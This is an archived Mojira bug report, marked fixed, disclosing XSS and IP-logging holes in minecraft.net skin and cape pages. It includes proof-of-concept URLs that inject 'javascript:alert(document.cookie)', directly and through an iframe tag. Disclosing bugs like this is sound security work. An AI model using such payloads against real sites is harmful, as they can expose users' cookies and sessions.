Mojira Archive
WEB-1212

dangerous vulnerabilities (xss/ip logger)

hello, i found a bug in setting skin (img tag) and xss
links:
https://my.minecraft.net/profile/skin/remote?url=https://techcrunch.com/wp-content/uploads/2015/08/safe_image.gif

https://my.minecraft.net/profile/skin/remote?url=javascript:alert(document.cookie);

(the picture can be an ip logger)

https://minecraft.net/en-us/profile/redeemCape/<iframe src=javascript:alert(document.cookie)>

 it would be nice if i received bug bounty  

Fixed

Jakub Szturomski

[Mojang] Web Team

2019-01-28, 01:06 AM

2020-05-25, 08:46 AM

2020-05-25, 08:46 AM

0

2